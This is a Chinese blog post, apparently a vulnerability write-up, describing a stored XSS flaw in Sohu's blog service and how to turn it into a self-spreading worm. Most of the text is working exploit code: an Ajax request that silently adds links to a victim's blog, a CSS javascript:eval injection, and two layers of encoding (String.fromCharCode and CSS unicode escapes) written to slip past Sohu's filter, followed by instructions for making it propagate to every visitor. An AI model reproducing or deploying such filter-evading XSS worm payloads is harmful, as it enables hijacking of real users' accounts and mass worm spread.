搜狐ajax hacking漏洞详解——XSS worm

鬼仔:记得以前有个 Myspace 的XSS worm。

作者:monyer
来源:梦之光芒

搜狐博客存在ajax hacking漏洞,可以实现web worm的功能,下面是具体的利用方法:

标准的ajax数据提交,该ajax的XmlHttp方式为微软msdn提供的标准方法!

<script type="text/javascript">

window.onload=function()
{
var XmlHttp=new ActiveXObject("Microsoft.XMLhttp");
XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true);
XmlHttp.send(null);
XmlHttp.onreadystatechange=ServerProcess;
}
function ServerProcess()
{
if (XmlHttp.readystate==4 || XmlHttp.readystate=='complete')
{
alert(XmlHttp.responseText);
}
}
</script>

把以上代码缩成一行

window.onload=function(){var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true); XmlHttp.send(null);}

漏洞的利用方式
<div style=”background-image:url(javascript:)”>不能执行多语句,所以转到下面的方法eval进行
<div style=”background-image:url(javascript:eval())”>有引号,所以转到下面的方法,String.fromCharCode
<div style=”background-image:url(javascript:eval(String.fromCharCode([十进制的code])))”>这回完成了

在eval里,代码可以自动执行,因此可以不用window.onload,同时去掉函数结构!

var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true); XmlHttp.send(null);

将上述代码进行String.fromCharCode转码

118,97,114,32,88,109,108,72,116,116,112,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,104,116,116,112,34,41,59,32,88,109,108,72,116,116,112,46,79,112,101,110,40,34,103,101,116,34,44,34,104,116,116,112,58,47,47,98,108,111,103,46,115,111,104,117,46,99,111,109,47,109,97,110,97,103,101,47,108,105,110,107,46,100,111,63,109,61,97,100,100,38,116,105,116,108,101,61,77,111,110,121,101,114,38,100,101,115,99,61,77,111,110,121,101,114,37,50,48,105,115,37,50,48,109,121,37,50,48,104,101,114,111,37,50,48,37,50,49,38,108,105,110,107,61,104,116,116,112,37,51,65,47,47,104,105,46,98,97,105,100,117,46,99,111,109,47,109,111,110,121,101,114,38,95,34,44,116,114,117,101,41,59,32,88,109,108,72,116,116,112,46,115,101,110,100,40,110,117,108,108,41,59

因此有如下代码,该代码是可以执行的,但会被sohu过滤掉,因此需要进一步加密!

<div style="background-image:url(javascript:eval(String.fromCharCode(118,97,114,32,88,109,108,72,116,116,112,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,104,116,116,112,34,41,59,32,88,109,108,72,116,116,112,46,79,112,101,110,40,34,103,101,116,34,44,34,104,116,116,112,58,47,47,98,108,111,103,46,115,111,104,117,46,99,111,109,47,109,97,110,97,103,101,47,108,105,110,107,46,100,111,63,109,61,97,100,100,38,116,105,116,108,101,61,77,111,110,121,101,114,38,100,101,115,99,61,77,111,110,121,101,114,37,50,48,105,115,37,50,48,109,121,37,50,48,104,101,114,111,37,50,48,37,50,49,38,108,105,110,107,61,104,116,116,112,37,51,65,47,47,104,105,46,98,97,105,100,117,46,99,111,109,47,109,111,110,121,101,114,38,95,34,44,116,114,117,101,41,59,32,88,109,108,72,116,116,112,46,115,101,110,100,40,110,117,108,108,41,59)))">

再次加密后的结果!

<div style="BACKGROUND-image:\0075\0072\006c\0028\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0065\0076\0061\006c\0028\0053\0074\0072\0069\006e\0067\002e\0066\0072\006f\006d\0043\0068\0061\0072\0043\006f\0064\0065\0028\0031\0031\0038\002c\0039\0037\002c\0031\0031\0034\002c\0033\0032\002c\0038\0038\002c\0031\0030\0039\002c\0031\0030\0038\002c\0037\0032\002c\0031\0031\0036\002c\0031\0031\0036\002c\0031\0031\0032\002c\0036\0031\002c\0031\0031\0030\002c\0031\0030\0031\002c\0031\0031\0039\002c\0033\0032\002c\0036\0035\002c\0039\0039\002c\0031\0031\0036\002c\0031\0030\0035\002c\0031\0031\0038\002c\0031\0030\0031\002c\0038\0038\002c\0037\0039\002c\0039\0038\002c\0031\0030\0036\002c\0031\0030\0031\002c\0039\0039\002c\0031\0031\0036\002c\0034\0030\002c\0033\0034\002c\0037\0037\002c\0031\0030\0035\002c\0039\0039\002c\0031\0031\0034\002c\0031\0031\0031\002c\0031\0031\0035\002c\0031\0031\0031\002c\0031\0030\0032\002c\0031\0031\0036\002c\0034\0036\002c\0038\0038\002c\0037\0037\002c\0037\0036\002c\0031\0030\0034\002c\0031\0031\0036\002c\0031\0031\0036\002c\0031\0031\0032\002c\0033\0034\002c\0034\0031\002c\0035\0039\002c\0033\0032\002c\0038\0038\002c\0031\0030\0039\002c\0031\0030\0038\002c\0037\0032\002c\0031\0031\0036\002c\0031\0031\0036\002c\0031\0031\0032\002c\0034\0036\002c\0037\0039\002c\0031\0031\0032\002c\0031\0030\0031\002c\0031\0031\0030\002c\0034\0030\002c\0033\0034\002c\0031\0030\0033\002c\0031\0030\0031\002c\0031\0031\0036\002c\0033\0034\002c\0034\0034\002c\0033\0034\002c\0031\0030\0034\002c\0031\0031\0036\002c\0031\0031\0036\002c\0031\0031\0032\002c\0035\0038\002c\0034\0037\002c\0034\0037\002c\0031\0030\0039\002c\0031\0031\0031\002c\0031\0031\0030\002c\0031\0032\0031\002c\0031\0030\0031\002c\0031\0031\0034\002c\0034\0036\002c\0039\0038\002c\0031\0030\0038\002c\0031\0031\0031\002c\0031\0030\0033\002c\0034\0036\002c\0031\0031\0035\002c\0031\0031\0031\002c\0031\0030\0034\002c\0031\0031\0037\002c\0034\0036\002c\0039\0039\002c\0031\0031\0031\002c\0031\0030\0039\002c\0034\0037\002c\0031\0030\0039\002c\0039\0037\002c\0031\0031\0030\002c\0039\0037\002c\0031\0030\0033\002c\0031\0030\0031\002c\0034\0037\002c\0031\0030\0038\002c\0031\0030\0035\002c\0031\0031\0030\002c\0031\0030\0037\002c\0034\0036\002c\0031\0030\0030\002c\0031\0031\0031\002c\0036\0033\002c\0031\0030\0039\002c\0036\0031\002c\0039\0037\002c\0031\0030\0030\002c\0031\0030\0030\002c\0033\0038\002c\0031\0031\0036\002c\0031\0030\0035\002c\0031\0031\0036\002c\0031\0030\0038\002c\0031\0030\0031\002c\0036\0031\002c\0037\0037\002c\0031\0031\0031\002c\0031\0031\0030\002c\0031\0032\0031\002c\0031\0030\0031\002c\0031\0031\0034\002c\0033\0038\002c\0031\0030\0030\002c\0031\0030\0031\002c\0031\0031\0035\002c\0039\0039\002c\0036\0031\002c\0037\0037\002c\0031\0031\0031\002c\0031\0031\0030\002c\0031\0032\0031\002c\0031\0030\0031\002c\0031\0031\0034\002c\0033\0037\002c\0035\0030\002c\0034\0038\002c\0031\0030\0035\002c\0031\0031\0035\002c\0033\0037\002c\0035\0030\002c\0034\0038\002c\0031\0030\0039\002c\0031\0032\0031\002c\0033\0037\002c\0035\0030\002c\0034\0038\002c\0031\0030\0034\002c\0031\0030\0031\002c\0031\0031\0034\002c\0031\0031\0031\002c\0033\0037\002c\0035\0030\002c\0034\0038\002c\0033\0037\002c\0035\0030\002c\0034\0039\002c\0033\0038\002c\0031\0030\0038\002c\0031\0030\0035\002c\0031\0031\0030\002c\0031\0030\0037\002c\0036\0031\002c\0031\0030\0034\002c\0031\0031\0036\002c\0031\0031\0036\002c\0031\0031\0032\002c\0033\0037\002c\0035\0031\002c\0036\0035\002c\0034\0037\002c\0034\0037\002c\0031\0030\0034\002c\0031\0030\0035\002c\0034\0036\002c\0039\0038\002c\0039\0037\002c\0031\0030\0035\002c\0031\0030\0030\002c\0031\0031\0037\002c\0034\0036\002c\0039\0039\002c\0031\0031\0031\002c\0031\0030\0039\002c\0034\0037\002c\0031\0030\0039\002c\0031\0031\0031\002c\0031\0031\0030\002c\0031\0032\0031\002c\0031\0030\0031\002c\0031\0031\0034\002c\0033\0038\002c\0039\0035\002c\0033\0034\002c\0034\0034\002c\0031\0031\0036\002c\0031\0031\0034\002c\0031\0031\0037\002c\0031\0030\0031\002c\0034\0031\002c\0035\0039\002c\0033\0032\002c\0038\0038\002c\0031\0030\0039\002c\0031\0030\0038\002c\0037\0032\002c\0031\0031\0036\002c\0031\0031\0036\002c\0031\0031\0032\002c\0034\0036\002c\0031\0031\0035\002c\0031\0030\0031\002c\0031\0031\0030\002c\0031\0030\0030\002c\0034\0030\002c\0031\0031\0030\002c\0031\0031\0037\002c\0031\0030\0038\002c\0031\0030\0038\002c\0034\0031\002c\0035\0039\0029\0029\0029"></div>

加入文章后,访问我空间的人会被自动加上链接,如果再在他的页面加上window.location.href的话,就可以实在蠕虫功能,无限制蔓延,中招的人会成为傀儡,数目也会成几何分布增长知道蔓延到sohu的每一个用户!

相关日志

发表评论